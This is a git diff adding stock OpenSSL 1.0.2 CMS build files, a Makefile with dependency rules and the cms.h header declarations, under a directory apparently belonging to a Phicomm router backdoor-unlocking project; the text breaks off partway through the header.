diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/Makefile.save
new file mode 100644
index 0000000..b05daf6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/Makefile.save
@@ -0,0 +1,279 @@
+#
+# OpenSSL/crypto/cms/Makefile
+#
+
+DIR=	cms
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= cms_lib.c cms_asn1.c cms_att.c cms_io.c cms_smime.c cms_err.c \
+	cms_sd.c cms_dd.c cms_cd.c cms_env.c cms_enc.c cms_ess.c \
+	cms_pwri.c cms_kari.c
+LIBOBJ= cms_lib.o cms_asn1.o cms_att.o cms_io.o cms_smime.o cms_err.o \
+	cms_sd.o cms_dd.o cms_cd.o cms_env.o cms_enc.o cms_ess.o \
+	cms_pwri.o cms_kari.o
+
+SRC= $(LIBSRC)
+
+EXHEADER=  cms.h
+HEADER=	cms_lcl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+test:
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+cms_asn1.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+cms_asn1.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+cms_asn1.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+cms_asn1.o: ../../include/openssl/e_os2.h ../../include/openssl/evp.h
+cms_asn1.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+cms_asn1.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+cms_asn1.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cms_asn1.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+cms_asn1.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+cms_asn1.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+cms_asn1.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+cms_asn1.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+cms_asn1.o: cms.h cms_asn1.c cms_lcl.h
+cms_att.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+cms_att.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+cms_att.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+cms_att.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+cms_att.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+cms_att.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+cms_att.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+cms_att.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pem.h
+cms_att.o: ../../include/openssl/pem2.h ../../include/openssl/pkcs7.h
+cms_att.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+cms_att.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+cms_att.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+cms_att.o: ../../include/openssl/x509v3.h cms.h cms_att.c cms_lcl.h
+cms_cd.o: ../../e_os.h ../../include/openssl/asn1.h
+cms_cd.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+cms_cd.o: ../../include/openssl/buffer.h ../../include/openssl/cms.h
+cms_cd.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+cms_cd.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+cms_cd.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+cms_cd.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+cms_cd.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+cms_cd.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pem.h
+cms_cd.o: ../../include/openssl/pem2.h ../../include/openssl/pkcs7.h
+cms_cd.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+cms_cd.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+cms_cd.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+cms_cd.o: ../../include/openssl/x509v3.h ../cryptlib.h cms_cd.c cms_lcl.h
+cms_dd.o: ../../e_os.h ../../include/openssl/asn1.h
+cms_dd.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+cms_dd.o: ../../include/openssl/buffer.h ../../include/openssl/cms.h
+cms_dd.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+cms_dd.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+cms_dd.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+cms_dd.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+cms_dd.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+cms_dd.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pem.h
+cms_dd.o: ../../include/openssl/pem2.h ../../include/openssl/pkcs7.h
+cms_dd.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+cms_dd.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+cms_dd.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+cms_dd.o: ../../include/openssl/x509v3.h ../cryptlib.h cms_dd.c cms_lcl.h
+cms_enc.o: ../../e_os.h ../../include/openssl/asn1.h
+cms_enc.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+cms_enc.o: ../../include/openssl/buffer.h ../../include/openssl/cms.h
+cms_enc.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+cms_enc.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+cms_enc.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+cms_enc.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+cms_enc.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+cms_enc.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pem.h
+cms_enc.o: ../../include/openssl/pem2.h ../../include/openssl/pkcs7.h
+cms_enc.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+cms_enc.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+cms_enc.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+cms_enc.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+cms_enc.o: ../cryptlib.h cms_enc.c cms_lcl.h
+cms_env.o: ../../e_os.h ../../include/openssl/aes.h
+cms_env.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+cms_env.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+cms_env.o: ../../include/openssl/cms.h ../../include/openssl/conf.h
+cms_env.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+cms_env.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+cms_env.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+cms_env.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+cms_env.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cms_env.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+cms_env.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+cms_env.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+cms_env.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+cms_env.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+cms_env.o: ../../include/openssl/x509v3.h ../asn1/asn1_locl.h ../cryptlib.h
+cms_env.o: cms_env.c cms_lcl.h
+cms_err.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+cms_err.o: ../../include/openssl/buffer.h ../../include/openssl/cms.h
+cms_err.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+cms_err.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+cms_err.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+cms_err.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+cms_err.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cms_err.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+cms_err.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+cms_err.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+cms_err.o: ../../include/openssl/x509_vfy.h cms_err.c
+cms_ess.o: ../../e_os.h ../../include/openssl/asn1.h
+cms_ess.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+cms_ess.o: ../../include/openssl/buffer.h ../../include/openssl/cms.h
+cms_ess.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+cms_ess.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+cms_ess.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+cms_ess.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+cms_ess.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+cms_ess.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pem.h
+cms_ess.o: ../../include/openssl/pem2.h ../../include/openssl/pkcs7.h
+cms_ess.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+cms_ess.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+cms_ess.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+cms_ess.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+cms_ess.o: ../cryptlib.h cms_ess.c cms_lcl.h
+cms_io.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+cms_io.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+cms_io.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+cms_io.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+cms_io.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+cms_io.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+cms_io.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cms_io.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+cms_io.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+cms_io.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+cms_io.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+cms_io.o: ../../include/openssl/x509_vfy.h cms.h cms_io.c cms_lcl.h
+cms_kari.o: ../../e_os.h ../../include/openssl/aes.h
+cms_kari.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+cms_kari.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+cms_kari.o: ../../include/openssl/cms.h ../../include/openssl/conf.h
+cms_kari.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+cms_kari.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+cms_kari.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+cms_kari.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+cms_kari.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cms_kari.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+cms_kari.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+cms_kari.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+cms_kari.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+cms_kari.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+cms_kari.o: ../../include/openssl/x509v3.h ../asn1/asn1_locl.h ../cryptlib.h
+cms_kari.o: cms_kari.c cms_lcl.h
+cms_lib.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+cms_lib.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+cms_lib.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+cms_lib.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+cms_lib.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+cms_lib.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+cms_lib.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+cms_lib.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pem.h
+cms_lib.o: ../../include/openssl/pem2.h ../../include/openssl/pkcs7.h
+cms_lib.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+cms_lib.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+cms_lib.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+cms_lib.o: ../../include/openssl/x509v3.h cms.h cms_lcl.h cms_lib.c
+cms_pwri.o: ../../e_os.h ../../include/openssl/aes.h
+cms_pwri.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+cms_pwri.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+cms_pwri.o: ../../include/openssl/cms.h ../../include/openssl/conf.h
+cms_pwri.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+cms_pwri.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+cms_pwri.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+cms_pwri.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+cms_pwri.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cms_pwri.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+cms_pwri.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+cms_pwri.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+cms_pwri.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+cms_pwri.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+cms_pwri.o: ../../include/openssl/x509v3.h ../asn1/asn1_locl.h ../cryptlib.h
+cms_pwri.o: cms_lcl.h cms_pwri.c
+cms_sd.o: ../../e_os.h ../../include/openssl/asn1.h
+cms_sd.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+cms_sd.o: ../../include/openssl/buffer.h ../../include/openssl/cms.h
+cms_sd.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+cms_sd.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+cms_sd.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+cms_sd.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+cms_sd.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+cms_sd.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pem.h
+cms_sd.o: ../../include/openssl/pem2.h ../../include/openssl/pkcs7.h
+cms_sd.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+cms_sd.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+cms_sd.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+cms_sd.o: ../../include/openssl/x509v3.h ../asn1/asn1_locl.h ../cryptlib.h
+cms_sd.o: cms_lcl.h cms_sd.c
+cms_smime.o: ../../e_os.h ../../include/openssl/asn1.h
+cms_smime.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+cms_smime.o: ../../include/openssl/buffer.h ../../include/openssl/cms.h
+cms_smime.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+cms_smime.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+cms_smime.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+cms_smime.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+cms_smime.o: ../../include/openssl/opensslconf.h
+cms_smime.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cms_smime.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+cms_smime.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+cms_smime.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+cms_smime.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+cms_smime.o: ../asn1/asn1_locl.h ../cryptlib.h cms_lcl.h cms_smime.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms.h
new file mode 100644
index 0000000..e6c7f96
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms.h
@@ -0,0 +1,555 @@
+/* crypto/cms/cms.h */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
+ * project.
+ */
+/* ====================================================================
+ * Copyright (c) 2008 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ */
+
+#ifndef HEADER_CMS_H
+# define HEADER_CMS_H
+
+# include <openssl/x509.h>
+
+# ifdef OPENSSL_NO_CMS
+#  error CMS is disabled.
+# endif
+
+#ifdef __cplusplus
+extern "C" {
+#endif
+
+typedef struct CMS_ContentInfo_st CMS_ContentInfo;
+typedef struct CMS_SignerInfo_st CMS_SignerInfo;
+typedef struct CMS_CertificateChoices CMS_CertificateChoices;
+typedef struct CMS_RevocationInfoChoice_st CMS_RevocationInfoChoice;
+typedef struct CMS_RecipientInfo_st CMS_RecipientInfo;
+typedef struct CMS_ReceiptRequest_st CMS_ReceiptRequest;
+typedef struct CMS_Receipt_st CMS_Receipt;
+typedef struct CMS_RecipientEncryptedKey_st CMS_RecipientEncryptedKey;
+typedef struct CMS_OtherKeyAttribute_st CMS_OtherKeyAttribute;
+
+DECLARE_STACK_OF(CMS_SignerInfo)
+DECLARE_STACK_OF(GENERAL_NAMES)
+DECLARE_STACK_OF(CMS_RecipientEncryptedKey)
+DECLARE_ASN1_FUNCTIONS(CMS_ContentInfo)
+DECLARE_ASN1_FUNCTIONS(CMS_ReceiptRequest)
+DECLARE_ASN1_PRINT_FUNCTION(CMS_ContentInfo)
+
+# define CMS_SIGNERINFO_ISSUER_SERIAL    0
+# define CMS_SIGNERINFO_KEYIDENTIFIER    1
+
+# define CMS_RECIPINFO_NONE              -1
+# define CMS_RECIPINFO_TRANS             0
+# define CMS_RECIPINFO_AGREE             1
+# define CMS_RECIPINFO_KEK               2
+# define CMS_RECIPINFO_PASS              3
+# define CMS_RECIPINFO_OTHER             4
+
+/* S/MIME related flags */
+
+# define CMS_TEXT                        0x1
+# define CMS_NOCERTS                     0x2
+# define CMS_NO_CONTENT_VERIFY           0x4
+# define CMS_NO_ATTR_VERIFY              0x8
+# define CMS_NOSIGS                      \
+                        (CMS_NO_CONTENT_VERIFY|CMS_NO_ATTR_VERIFY)
+# define CMS_NOINTERN                    0x10
+# define CMS_NO_SIGNER_CERT_VERIFY       0x20
+# define CMS_NOVERIFY                    0x20
+# define CMS_DETACHED                    0x40
+# define CMS_BINARY                      0x80
+# define CMS_NOATTR                      0x100
+# define CMS_NOSMIMECAP                  0x200
+# define CMS_NOOLDMIMETYPE               0x400
+# define CMS_CRLFEOL                     0x800
+# define CMS_STREAM                      0x1000
+# define CMS_NOCRL                       0x2000
+# define CMS_PARTIAL                     0x4000
+# define CMS_REUSE_DIGEST                0x8000
+# define CMS_USE_KEYID                   0x10000
+# define CMS_DEBUG_DECRYPT               0x20000
+# define CMS_KEY_PARAM                   0x40000
+
+const ASN1_OBJECT *CMS_get0_type(CMS_ContentInfo *cms);
+
+BIO *CMS_dataInit(CMS_ContentInfo *cms, BIO *icont);
+int CMS_dataFinal(CMS_ContentInfo *cms, BIO *bio);
+
+ASN1_OCTET_STRING **CMS_get0_content(CMS_ContentInfo *cms);
+int CMS_is_detached(CMS_ContentInfo *cms);
+int CMS_set_detached(CMS_ContentInfo *cms, int detached);
+
+# ifdef HEADER_PEM_H
+DECLARE_PEM_rw_const(CMS, CMS_ContentInfo)
+# endif
+int CMS_stream(unsigned char ***boundary, CMS_ContentInfo *cms);
+CMS_ContentInfo *d2i_CMS_bio(BIO *bp, CMS_ContentInfo **cms);
+int i2d_CMS_bio(BIO *bp, CMS_ContentInfo *cms);
+
+BIO *BIO_new_CMS(BIO *out, CMS_ContentInfo *cms);
+int i2d_CMS_bio_stream(BIO *out, CMS_ContentInfo *cms, BIO *in, int flags);
+int PEM_write_bio_CMS_stream(BIO *out, CMS_ContentInfo *cms, BIO *in,
+                             int flags);
+CMS_ContentInfo *SMIME_read_CMS(BIO *bio, BIO **bcont);
+int SMIME_write_CMS(BIO *bio, CMS_ContentInfo *cms, BIO *data, int flags);
+
+int CMS_final(CMS_ContentInfo *cms, BIO *data, BIO *dcont,
+              unsigned int flags);
+
+CMS_ContentInfo *CMS_sign(X509 *signcert, EVP_PKEY *pkey,
+                          STACK_OF(X509) *certs, BIO *data,
+                          unsigned int flags);
+
+CMS_ContentInfo *CMS_sign_receipt(CMS_SignerInfo *si,
+                                  X509 *signcert, EVP_PKEY *pkey,
+                                  STACK_OF(X509) *certs, unsigned int flags);
+
+int CMS_data(CMS_ContentInfo *cms, BIO *out, unsigned int flags);
+CMS_ContentInfo *CMS_data_create(BIO *in, unsigned int flags);
+
+int CMS_digest_verify(CMS_ContentInfo *cms, BIO *dcont, BIO *out,
+                      unsigned int flags);
+CMS_ContentInfo *CMS_digest_create(BIO *in, const EVP_MD *md,
+                                   unsigned int flags);
+
+int CMS_EncryptedData_decrypt(CMS_ContentInfo *cms,
+                              const unsigned char *key, size_t keylen,
+                              BIO *dcont, BIO *out, unsigned int flags);
+
+CMS_ContentInfo *CMS_EncryptedData_encrypt(BIO *in, const EVP_CIPHER *cipher,
+                                           const unsigned char *key,
+                                           size_t keylen, unsigned int flags);
+
+int CMS_EncryptedData_set1_key(CMS_ContentInfo *cms, const EVP_CIPHER *ciph,
+                               const unsigned char *key, size_t keylen);
+
+int CMS_verify(CMS_ContentInfo *cms, STACK_OF(X509) *certs,
+               X509_STORE *store, BIO *dcont, BIO *out, unsigned int flags);
+
+int CMS_verify_receipt(CMS_ContentInfo *rcms, CMS_ContentInfo *ocms,
+                       STACK_OF(X509) *certs,
+                       X509_STORE *store, unsigned int flags);
+
+STACK_OF(X509) *CMS_get0_signers(CMS_ContentInfo *cms);
+
+CMS_ContentInfo *CMS_encrypt(STACK_OF(X509) *certs, BIO *in,
+                             const EVP_CIPHER *cipher, unsigned int flags);
+
+int CMS_decrypt(CMS_ContentInfo *cms, EVP_PKEY *pkey, X509 *cert,
+                BIO *dcont, BIO *out, unsigned int flags);
+
+int CMS_decrypt_set1_pkey(CMS_ContentInfo *cms, EVP_PKEY *pk, X509 *cert);
+int CMS_decrypt_set1_key(CMS_ContentInfo *cms,
+                         unsigned char *key, size_t keylen,
+                         unsigned char *id, size_t idlen);
+int CMS_decrypt_set1_password(CMS_ContentInfo *cms,
+                              unsigned char *pass, ossl_ssize_t passlen);
+
+STACK_OF(CMS_RecipientInfo) *CMS_get0_RecipientInfos(CMS_ContentInfo *cms);
+int CMS_RecipientInfo_type(CMS_RecipientInfo *ri);
+EVP_PKEY_CTX *CMS_RecipientInfo_get0_pkey_ctx(CMS_RecipientInfo *ri);
+CMS_ContentInfo *CMS_EnvelopedData_create(const EVP_CIPHER *cipher);
+CMS_RecipientInfo *CMS_add1_recipient_cert(CMS_ContentInfo *cms,
+                                           X509 *recip, unsigned int flags);
+int CMS_RecipientInfo_set0_pkey(CMS_RecipientInfo *ri, EVP_PKEY *pkey);
+int CMS_RecipientInfo_ktri_cert_cmp(CMS_RecipientInfo *ri, X509 *cert);
+int CMS_RecipientInfo_ktri_get0_algs(CMS_RecipientInfo *ri,
+                                     EVP_PKEY **pk, X509 **recip,
+                                     X509_ALGOR **palg);
+int CMS_RecipientInfo_ktri_get0_signer_id(CMS_RecipientInfo *ri,
+                                          ASN1_OCTET_STRING **keyid,
+                                          X509_NAME **issuer,
+                                          ASN1_INTEGER **sno);
+
+CMS_RecipientInfo *CMS_add0_recipient_key(CMS_ContentInfo *cms, int nid,
+                                          unsigned char *key, size_t keylen,
+                                          unsigned char *id, size_t idlen,
+                                          ASN1_GENERALIZEDTIME *date,
+                                          ASN1_OBJECT *otherTypeId,
+                                          ASN1_TYPE *otherType);
+
+int CMS_RecipientInfo_kekri_get0_id(CMS_RecipientInfo *ri,
+                                    X509_ALGOR **palg,
+                                    ASN1_OCTET_STRING **pid,
+                                    ASN1_GENERALIZEDTIME **pdate,
+                                    ASN1_OBJECT **potherid,
+                                    ASN1_TYPE **pothertype);
+
+int CMS_RecipientInfo_set0_key(CMS_RecipientInfo *ri,
+                               unsigned char *key, size_t keylen);
+
+int CMS_RecipientInfo_kekri_id_cmp(CMS_RecipientInfo *ri,
+                                   const unsigned char *id, size_t idlen);
+
+int CMS_RecipientInfo_set0_password(CMS_RecipientInfo *ri,
+                                    unsigned char *pass,
+                                    ossl_ssize_t passlen);
+
+CMS_RecipientInfo *CMS_add0_recipient_password(CMS_ContentInfo *cms,
+                                               int iter, int wrap_nid,
+                                               int pbe_nid,
+                                               unsigned char *pass,
+                                               ossl_ssize_t passlen,
+                                               const EVP_CIPHER *kekciph);
+
+int CMS_RecipientInfo_decrypt(CMS_ContentInfo *cms, CMS_RecipientInfo *ri);
+int CMS_RecipientInfo_encrypt(CMS_ContentInfo *cms, CMS_RecipientInfo *ri);
+
+int CMS_uncompress(CMS_ContentInfo *cms, BIO *dcont, BIO *out,
+                   unsigned int flags);
+CMS_ContentInfo *CMS_compress(BIO *in, int comp_nid, unsigned int flags);
+
+int CMS_set1_eContentType(CMS_ContentInfo *cms, const ASN1_OBJECT *oid);
+const ASN1_OBJECT *CMS_get0_eContentType(CMS_ContentInfo *cms);
+
+CMS_CertificateChoices *CMS_add0_CertificateChoices(CMS_ContentInfo *cms);
+int CMS_add0_cert(CMS_ContentInfo *cms, X509 *cert);
